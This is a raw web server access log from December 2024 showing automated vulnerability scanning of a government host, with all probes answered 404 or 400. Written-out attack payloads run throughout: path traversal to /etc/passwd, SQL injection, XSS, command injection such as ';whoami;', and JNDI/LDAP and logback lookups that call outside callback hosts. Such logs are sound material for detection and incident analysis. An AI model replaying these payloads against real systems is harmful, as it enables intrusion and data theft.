0 48 2024-12-12 20:10:27 103.153.214.94 GET /login redirect=%2F 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.54+Safari/537.36 - 404 7 0 47 2024-12-12 20:10:27 103.153.214.94 GET /index.php option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 20:11:17 103.153.214.94 POST /logIn - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 20:12:03 103.153.214.94 POST /dip/api/login - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 20:12:25 103.153.214.94 GET /default/en_US/frame.html content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.19041 - 404 7 0 58 2024-12-12 20:12:29 103.153.214.94 GET /default/en_US/frame.A100.html sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 20:13:14 103.153.214.94 GET /index.php option=com_departments&id=-1%20UNION%20SELECT%201,md5(999999999),3,4,5,6,7,8-- 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 36 2024-12-12 20:13:38 103.153.214.94 POST /data/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:125.0)+Gecko/20100101+Firefox/125.0 https://bcvt.kontum.gov.vn:8172/login.html 404 7 0 218 2024-12-12 20:13:38 103.153.214.94 POST /data/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.26 https://bcvt.kontum.gov.vn:8172/login.html 404 7 0 233 2024-12-12 20:14:18 103.153.214.94 GET /__clockwork/app - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 60 2024-12-12 20:14:35 103.153.214.94 GET /autodiscover/autodiscover.json @test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 39 2024-12-12 20:14:39 103.153.214.94 GET /autodiscover/autodiscover.json @test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.16 - 404 7 0 64 2024-12-12 20:16:01 103.153.214.94 GET /yyoa/common/js/menu/test.jsp doType=101&S1=(SELECT%20md5(999999999)) 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 37 2024-12-12 20:16:36 103.153.214.94 GET /index.php option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 41 2024-12-12 20:16:50 103.153.214.94 GET /logfile d=crossdomain.xml 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-12 20:17:31 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 58 2024-12-12 20:17:35 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=%2F..%2Fwp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 80 2024-12-12 20:17:58 103.153.214.94 GET /CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 20:18:08 103.153.214.94 GET /nagiosql/admin/commandline.php cname=%27%20union%20select%20concat(md5(2092177583))%23 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 53 2024-12-12 20:18:08 103.153.214.94 GET /install/ step=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 84 2024-12-12 20:18:17 103.153.214.94 POST /sysmgmt/2015/bmc/session - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 20:18:39 103.153.214.94 GET /config/getuser index=0 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 36 2024-12-12 20:18:39 103.153.214.94 GET /home - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 31 2024-12-12 20:18:39 103.153.214.94 GET /index.php option=com_graphics&controller=../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 43 2024-12-12 20:19:17 103.153.214.94 GET /hue/accounts/login next=/ 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.15 - 404 7 0 232 2024-12-12 20:19:46 103.153.214.94 GET /.cpr/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 52 2024-12-12 20:20:39 103.153.214.94 GET /api/v1/ndconfig mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 20:20:39 103.153.214.94 GET /index.php option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 32 2024-12-12 20:20:58 103.153.214.94 GET /vpns/cfg/smb.conf - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 36 2024-12-12 20:20:58 103.153.214.94 GET /Catalog/BlobHandler.ashx Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 34 2024-12-12 20:21:03 103.153.214.94 POST /json - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 205 2024-12-12 20:21:12 103.153.214.94 GET /wp-admin/install.php step=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 39 2024-12-12 20:21:13 103.153.214.94 POST /index.php/verifyLogin/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 201 2024-12-12 20:21:13 103.153.214.94 GET /api/v3/users - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/617.29+(KHTML,+like+Gecko)+Version/17.7+Safari/617.29 - 404 7 0 203 2024-12-12 20:21:15 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 20:21:33 103.153.214.94 GET /wp-content/plugins/socialfit/popup.php service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36+Edge/18.17763 - 404 7 0 84 2024-12-12 20:21:36 103.153.214.94 GET /rest/v1/AccountService/Accounts - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36+Edge/17.17134 - 404 7 0 200 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 197 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.32+Safari/537.36 - 404 7 0 201 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.7.24 - 404 7 0 199 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/113.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 200 2024-12-12 20:22:09 103.153.214.94 POST /web/rest/v1/login/sessions - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 225 2024-12-12 20:22:47 103.153.214.94 GET /WebInterface/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/616.8+(KHTML,+like+Gecko)+Version/17.2.12+Safari/616.8 - 404 7 0 203 2024-12-12 20:24:19 103.153.214.94 GET /include/downmix.inc.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.6)+AppleWebKit/616.20+(KHTML,+like+Gecko)+Version/17.1.83+Safari/616.20 - 404 7 0 42 2024-12-12 20:25:00 103.153.214.94 GET /WebInterface/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 242 2024-12-12 20:25:09 103.153.214.94 POST /WebInterface/function/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)++++Chrome/55.0.2883.95+Safari/537.36 https://bcvt.kontum.gov.vn:8172/WebInterface/login.html 404 7 0 207 2024-12-12 20:25:32 103.153.214.94 GET /downlot.php file=../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.79 - 404 7 0 63 2024-12-12 20:27:19 103.153.214.94 GET /admin/airflow/code root&dag_id=example_passing_params_via_test_command 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 20:27:23 103.153.214.94 GET /code dag_id=example_passing_params_via_test_command 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 - 404 7 0 55 2024-12-12 20:27:50 103.153.214.94 GET /index.php option=com_omphotogallery&controller=../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 55 2024-12-12 20:27:52 103.153.214.94 GET /ucmdb-api/connect - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.61 - 404 7 0 55 2024-12-12 20:28:08 103.153.214.94 GET /api/dns - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 63 2024-12-12 20:29:13 103.153.214.94 POST /api/v1/users/signin - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 20:29:26 103.153.214.94 GET /7/0/33/1d/www.citysearch.com/search what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 61 2024-12-12 20:29:43 103.153.214.94 GET /zc_install/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 20:29:43 103.153.214.94 GET /ccmivr/IVRGetAudioFile.do file=../../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 20:29:43 103.153.214.94 GET /usr-cgi/logdownload.cgi file=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 20:30:13 103.153.214.94 GET /index.php option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 20:30:53 103.153.214.94 GET /web/database/manager - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 59 2024-12-12 20:31:50 103.153.214.94 GET /mainfile.php username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 86 2024-12-12 20:31:56 103.153.214.94 DELETE /druid/coordinator/v1/lookups/config/${jndi:ldap:/ctcj3jjbclslbev4n7q08ijs7iwktgtim.oast.live/tea} - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+ZOE/2+Safari/605.1.15 - 400 0 0 42 2024-12-12 20:32:07 103.153.214.94 GET /monitoring/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 400 0 0 35 2024-12-12 20:32:10 103.153.214.94 GET /photo/combine.php type=javascript&g=core-r7rules/../../../hello.php. 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 57 2024-12-12 20:32:15 103.153.214.94 GET /blast/nph-viewgif.cgi ../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 33 2024-12-12 20:32:39 103.153.214.94 GET /wp-admin/admin-ajax.php action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)> 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.17 - 404 7 0 39 2024-12-12 20:32:44 103.153.214.94 GET /mobile/plugin/CheckServer.jsp type=mobileSetting 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 20:33:16 103.153.214.94 GET /api/model_report/file/download index=/&ext=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6.1+Safari/605.1.15 - 404 7 0 60 2024-12-12 20:33:28 103.153.214.94 GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 400 0 0 67 2024-12-12 20:33:32 103.153.214.94 GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 400 0 0 68 2024-12-12 20:35:08 103.153.214.94 POST /member/authenticate - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 249 2024-12-12 20:35:22 103.153.214.94 GET /v12/setup/temp/admin.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 56 2024-12-12 20:36:12 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 20:36:18 103.153.214.94 GET /owncloud/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.24 - 404 7 0 37 2024-12-12 20:36:24 103.153.214.94 GET /druid/submitLogin - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 202 2024-12-12 20:36:37 103.153.214.94 GET /iweboffice/officeserver.php OPTION=LOADFILE&FILENAME=../mysql_config.ini 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 53 2024-12-12 20:38:03 103.153.214.94 GET /cgi-bin/cgibox .cab 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 20:38:08 103.153.214.94 GET /cgi-bin/cgibox /nobody 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 20:38:55 103.153.214.94 GET /setup/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 196 2024-12-12 20:39:06 103.153.214.94 GET /plus/carbuyaction.php dopost=return&code=../../ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:96.0)+Gecko/20100101+Firefox/96.0 - 404 7 0 32 2024-12-12 20:39:07 103.153.214.94 GET /wp-json/acf/v3/options/a id=active&field=plugins 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 20:40:43 103.153.214.94 GET /recent_scans/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 34 2024-12-12 20:41:58 103.153.214.94 GET /tool/log/c.php strip_slashes=system&host=ipconfig 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 20:41:59 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 105 2024-12-12 20:42:55 103.153.214.94 GET /pandora_console/ajax.php page=../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.27 - 404 7 0 38 2024-12-12 20:42:55 103.153.214.94 GET /index.php download=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 20:42:57 103.153.214.94 GET /decisioncenter-api/v1/about datasource=ldap://ctcj3jjbclslbev4n7q08w7kkxgamza83.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 31 2024-12-12 20:43:09 103.153.214.94 GET /installed_emanual_down.html path=/manual/../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 65 2024-12-12 20:43:12 103.153.214.94 GET /index.php option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 55 2024-12-12 20:43:13 103.153.214.94 GET /upgrade_handle.php cmd=writeuploaddir&uploaddir=%27;whoami;%27 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 31 2024-12-12 20:43:16 103.153.214.94 POST /internal/security/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows;+Windows+NT+10.1;+Win64;+x64;+en-US)+Gecko/20100101+Firefox/49.5 https://bcvt.kontum.gov.vn:8172/login 404 7 0 199 2024-12-12 20:43:42 103.153.214.94 GET /cgi-bin/privatekey.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.25 - 404 7 0 45 2024-12-12 20:43:44 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 400 0 0 37 2024-12-12 20:44:25 103.153.214.94 GET /wp-admin/admin-ajax.php action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 20:46:32 103.153.214.94 GET /config/database.yml - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 127 2024-12-12 20:47:05 103.153.214.94 GET /wp-content/plugins/easy-wp-smtp/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 61 2024-12-12 20:47:09 103.153.214.94 GET /wp-content/plugins/wp-mail-smtp-pro/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 - 404 7 0 37 2024-12-12 20:47:36 103.153.214.94 GET /LetsEncrypt/Index fileName=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Mobile/15E148+Safari/604.1 - 404 7 0 32 2024-12-12 20:48:47 103.153.214.94 POST /api/v4/auth - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.32+Safari/537.36 - 404 7 0 210 2024-12-12 20:48:48 103.153.214.94 POST /token - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 201 2024-12-12 20:49:35 103.153.214.94 GET /exciter.php - 8172 - 156.251.25.152 